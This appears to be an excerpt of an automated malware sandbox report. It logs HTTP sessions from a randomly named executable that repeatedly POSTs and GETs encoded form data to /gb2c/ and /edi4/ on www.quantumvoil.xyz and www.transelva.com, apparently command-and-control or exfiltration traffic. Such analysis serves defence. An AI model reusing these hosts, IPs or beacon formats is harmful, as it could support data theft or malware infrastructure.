                                              Date: Mon, 01 Jul 2024 14:17:16 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.549745203.161.62.199803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:18.403979063 CEST1825OUTPOST /gb2c/ HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.quantumvoil.xyz
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.quantumvoil.xyz/gb2c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 78 2f 32 6b 4a 35 42 53 51 38 56 72 47 66 39 4c 4f 70 31 78 62 58 39 2b 65 68 6f 5a 6d 44 6c 35 31 33 4c 56 51 4d 68 6b 54 31 5a 58 38 51 4f 42 64 68 6e 4d 4b 58 61 4b 73 73 4a 65 4f 7a 45 56 76 47 31 53 66 5a 67 42 47 73 5a 7a 71 44 43 37 65 6b 37 32 6c 59 74 48 56 62 71 6d 65 65 57 2f 65 57 38 33 63 61 39 41 73 63 4e 56 2b 35 6d 76 67 72 61 38 71 74 58 7a 46 71 57 32 2f 65 55 4a 4e 71 31 2f 4c 4c 45 70 66 32 6f 51 42 4b 72 2f 4c 6c 39 79 4c 4f 31 2f 73 69 63 56 59 43 41 7a 68 62 76 67 4b 61 6e 4a 59 67 71 4e 42 42 70 59 41 52 46 38 63 50 33 61 49 61 74 62 58 46 73 62 7a 76 67 77 45 31 56 49 38 50 4b 62 57 38 36 7a 79 62 43 4c 79 57 4d 35 6f 71 31 64 62 59 38 37 34 52 6e 33 74 54 34 4e 63 49 39 43 58 31 52 6a 75 6f 63 67 75 38 4d 6c 72 61 4c 67 77 4f 38 4b 78 48 6a 72 57 6b 52 70 30 5a 34 31 70 53 4c 4f 39 49 39 74 36 65 70 6f 6e 43 58 67 6e 4c 75 62 30 71 50 6b 4b 4f 49 78 78 49 7a 4e 44 56 65 38 65 67 31 64 39 65 2f 7a 6f 44 32 5a 34 38 5a 63 2f 4b 2f 78 79 31 6b 57 48 55 [TRUNCATED]
                                              Data Ascii: 4dV43tA=x/2kJ5BSQ8VrGf9LOp1xbX9+ehoZmDl513LVQMhkT1ZX8QOBdhnMKXaKssJeOzEVvG1SfZgBGsZzqDC7ek72lYtHVbqmeeW/eW83ca9AscNV+5mvgra8qtXzFqW2/eUJNq1/LLEpf2oQBKr/Ll9yLO1/sicVYCAzhbvgKanJYgqNBBpYARF8cP3aIatbXFsbzvgwE1VI8PKbW86zybCLyWM5oq1dbY874Rn3tT4NcI9CX1Rjuocgu8MlraLgwO8KxHjrWkRp0Z41pSLO9I9t6eponCXgnLub0qPkKOIxxIzNDVe8eg1d9e/zoD2Z48Zc/K/xy1kWHUhF4K4eTdd9U0SC+Wk+DygyIUuLbQ1vFPJ8KtOKuFEMNkOOBSBip26+2qKKJk0NzUjWkm2dcXYUQf6xfnYZcnvv0sotd+P2T8wHUo/IQ1IYYfqa+jqsqUJ7no+URi/1LCq2iBe/CsSs60wFWgxZmi3T3qk1hyiuyrMdGxqETC+WHM+unK4KBxes0tpRQTZFxtJtBttu0ZAQh040ELMoUL17n8QG5KHMeH+Ylr9nVZ++ygbR7dBOPdaunW9m4+ESEfjZIq0TfdU+sjbvq4o8QVUPqab2S+62kMrJ82BvP6zt0su5R+21tmM/YhaQz0MeFZ8pvYzD1rQ4jM9cb3ybMOOdjdsIxdEtbv5MSGMCh4GDgR8U5gU4+5ZFIfuGi6fhmQw1RFUMXd8lhAmlYCSgRjcYTsc3ipa4UcZliZYglGmnn7mumeU9BDiQ9N05ya10JxdP4JjsHLXLX4wjxpvuYqbS8qZARquzerzA2BdZy6GrzIJk0IaO3z8O2qqrGervuC+Tgaukgp3rMsGy7fuLEMBc0G+OE4bB2CMq29bFl5pFmFn+R1uJvRAK6OTz8jFZc0GhlIfCCfvTtkNpPj/KT56LNopBYjMMN21OH6sZIVgAE6XCWaO2MopJucFO7MOYbsMQcEp9wIZLL9okBi1pZp5pJXgWgmiFfKRp [TRUNCATED]
                                              Jul 1, 2024 16:17:18.997564077 CEST533INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:18 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.549746203.161.62.199803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:20.934300900 CEST530OUTGET /gb2c/?3hkl=slNhbLXpBjO8vl&4dV43tA=89eEKNhTAfJ0K+ZNbo8QYk1fUSoEpApn1wnFOcVuW0oI5H3wAhPaJlWMgeBIfmA5pU1pUK0VAPZu7D3VTgjehpZPLbfme/O2eAoCBbtXgeZInoaphOuGkqvoaLKQybRjQA== HTTP/1.1
                                              Host: www.quantumvoil.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:21.528525114 CEST548INHTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:21 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.54974774.208.236.72803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:26.707967043 CEST782OUTPOST /edi4/ HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.transelva.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.transelva.com/edi4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 41 57 2b 74 33 55 62 48 42 46 52 65 70 49 76 58 55 4c 33 4c 58 38 36 6d 6f 31 67 75 50 76 33 65 73 71 42 4b 78 37 48 49 65 4a 4b 46 2f 2b 64 4d 6a 6e 41 72 7a 31 6c 41 61 62 6a 69 68 71 74 65 71 6b 6b 41 4b 49 65 75 4c 6a 43 45 42 33 73 56 4c 63 56 30 43 65 57 45 41 4c 63 45 79 37 64 75 63 6d 2b 43 34 37 72 42 45 32 34 39 69 45 73 4c 30 4d 33 46 73 66 67 4b 68 32 45 74 4b 73 7a 6a 77 30 6c 42 74 63 43 34 56 43 59 54 51 2f 43 6e 34 6a 49 49 6a 42 71 71 71 70 75 2f 36 54 4b 75 37 71 62 42 61 32 58 4c 4c 62 38 31 52 31 7a 78 4d 4e 41 51 39 42 5a 45 34 69 71 31 72 7a 47 71 4d 6b 67 50 30 37 30 3d
                                              Data Ascii: 4dV43tA=AW+t3UbHBFRepIvXUL3LX86mo1guPv3esqBKx7HIeJKF/+dMjnArz1lAabjihqteqkkAKIeuLjCEB3sVLcV0CeWEALcEy7ducm+C47rBE249iEsL0M3FsfgKh2EtKszjw0lBtcC4VCYTQ/Cn4jIIjBqqqpu/6TKu7qbBa2XLLb81R1zxMNAQ9BZE4iq1rzGqMkgP070=
                                              Jul 1, 2024 16:17:27.231482983 CEST523INHTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 239
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:27 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:27 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 65 6c 76 61 2e 63 6f 6d 2f 65 64 69 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.54974874.208.236.72803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:29.248939991 CEST802OUTPOST /edi4/ HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.transelva.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.transelva.com/edi4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 41 57 2b 74 33 55 62 48 42 46 52 65 6f 72 33 58 5a 49 76 4c 52 63 36 6e 74 31 67 75 41 50 33 61 73 72 39 4b 78 2f 58 59 66 36 75 46 2f 61 52 4d 69 6c 34 72 39 56 6c 41 64 72 6a 64 6c 71 74 58 71 6b 67 49 4b 4e 32 75 4c 67 2b 45 42 79 51 56 49 74 56 33 51 2b 57 47 4d 72 63 47 73 4c 64 75 63 6d 2b 43 34 37 76 72 45 32 51 39 6a 30 63 4c 32 6f 6a 47 68 2f 67 4a 6b 47 45 74 42 4d 7a 6e 77 30 6c 76 74 64 65 53 56 42 73 54 51 2f 79 6e 34 79 49 48 36 78 71 67 75 70 76 6e 77 79 37 38 78 70 58 64 65 41 69 35 62 49 49 71 51 44 65 62 57 76 49 34 75 68 31 38 6f 78 69 43 36 44 6e 44 57 48 77 2f 71 73 69 78 33 55 77 73 43 48 68 30 34 65 51 68 64 6a 6f 65 57 79 64 37
                                              Data Ascii: 4dV43tA=AW+t3UbHBFReor3XZIvLRc6nt1guAP3asr9Kx/XYf6uF/aRMil4r9VlAdrjdlqtXqkgIKN2uLg+EByQVItV3Q+WGMrcGsLducm+C47vrE2Q9j0cL2ojGh/gJkGEtBMznw0lvtdeSVBsTQ/yn4yIH6xqgupvnwy78xpXdeAi5bIIqQDebWvI4uh18oxiC6DnDWHw/qsix3UwsCHh04eQhdjoeWyd7
                                              Jul 1, 2024 16:17:29.779887915 CEST523INHTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 239
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:29 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:29 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 65 6c 76 61 2e 63 6f 6d 2f 65 64 69 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.54974974.208.236.72803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:31.777240038 CEST1819OUTPOST /edi4/ HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.transelva.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.transelva.com/edi4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Raw: 34 64 56 34 33 74 41 3d 41 57 2b 74 33 55 62 48 42 46 52 65 6f 72 33 58 5a 49 76 4c 52 63 36 6e 74 31 67 75 41 50 33 61 73 72 39 4b 78 2f 58 59 66 36 6d 46 2f 70 5a 4d 6a 43 73 72 38 56 6c 41 65 72 6a 59 6c 71 73 48 71 6b 59 4d 4b 4e 79 55 4c 6d 36 45 54 41 6f 56 44 2f 39 33 4a 4f 57 47 54 62 63 48 79 37 64 37 63 6d 75 4f 34 37 2f 72 45 32 51 39 6a 79 51 4c 79 38 33 47 6a 2f 67 4b 68 32 45 68 4b 73 7a 50 77 30 39 5a 74 64 61 6f 56 79 30 54 51 66 69 6e 36 41 67 48 6c 42 71 75 69 4a 76 30 77 79 32 69 78 70 4c 52 65 45 69 54 62 49 67 71 63 33 2b 45 46 64 59 50 73 69 74 69 69 79 32 58 67 47 44 41 56 31 67 48 75 75 69 4e 37 33 68 45 48 53 39 75 74 62 35 58 50 58 49 37 56 30 34 32 6d 31 45 6c 72 44 4b 56 46 74 37 74 4d 31 43 69 53 77 2b 7a 2b 54 71 2f 75 4a 4b 34 46 68 2b 5a 49 2b 45 39 78 2f 57 30 48 66 77 34 64 63 52 59 48 7a 4a 75 30 57 72 72 73 2f 32 49 4a 4c 6e 73 77 63 48 65 50 45 77 2f 53 68 34 79 77 39 65 36 6b 6c 57 69 62 6b 58 49 55 68 4f 6b 36 32 4f 56 55 77 6d 6d 67 6d 4e 59 4f 62 49 53 2f 66 [TRUNCATED]
                                              Data Ascii: 4dV43tA=AW+t3UbHBFReor3XZIvLRc6nt1guAP3asr9Kx/XYf6mF/pZMjCsr8VlAerjYlqsHqkYMKNyULm6ETAoVD/93JOWGTbcHy7d7cmuO47/rE2Q9jyQLy83Gj/gKh2EhKszPw09ZtdaoVy0TQfin6AgHlBquiJv0wy2ixpLReEiTbIgqc3+EFdYPsitiiy2XgGDAV1gHuuiN73hEHS9utb5XPXI7V042m1ElrDKVFt7tM1CiSw+z+Tq/uJK4Fh+ZI+E9x/W0Hfw4dcRYHzJu0Wrrs/2IJLnswcHePEw/Sh4yw9e6klWibkXIUhOk62OVUwmmgmNYObIS/f0VAB8HKhp9GZtLhobPcw1uRKQ9zlDhC4zP6fBol/6+eLtjHm8GVoo27RVU080C7Z8RJAsCESX0BYI4c9ys6T8XvqMZVYJQsN1lxbO/8jZHWk+Ze9ljwlCXwHKAslGD/qz3Fef527Ot7nQHv6yC/lUm7zkYv76JiRWq2lCGGyJhUUHt2izsyXAfjdKByHiw4ZeT8UNOUmqT2+Alhi153XIVrLpWAkHLjvrs6JDzNdpgaxZ9td4X6PcZHL3Gzyqh+yLI+RrI48ImQLn9+z03qNqvmExujM84bj7QhESfeowyknhTVkxRxdTw8haEmNyD2+Fnm4L/71u1UGN7kwZ+dn4YUlekSn9pmiUJV+T7GvMG7PGWjtW0A/CXIDLkM1bpBKXTqQtyF67ioZ0H/joZgm8KLyv9GrWMKAgElEB/5bgB4csizo9mJ75P2SZty1yatRFz+ZYILr0zvgUEYkd8lHlQAmb9GcwvntDje5+P0ZHPiZCpQWfky/ezBVNKg5vJ95pYlXBEyyK4RZCNBWWZrS7dDx/7xWC08tBJhhlNpJU5zLacOhatE3q1YGCQnW8qgmwJI2sTRlcyF5cbfhMEVv5gNAonetvSwdBX5IV84YRVgsXan0LOhj33k0gFMr4CwcKZlUBM08sfbHTQYDbcdvoxUgSqSKL4ely5 [TRUNCATED]
                                              Jul 1, 2024 16:17:32.310808897 CEST523INHTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 239
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:32 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:32 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 65 6c 76 61 2e 63 6f 6d 2f 65 64 69 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.54975074.208.236.72803608C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 1, 2024 16:17:34.312062025 CEST528OUTGET /edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:34.878957987 CEST849INHTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 404
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:34 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&3hkl=slNhbLXpBjO8vl
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:34 GMT
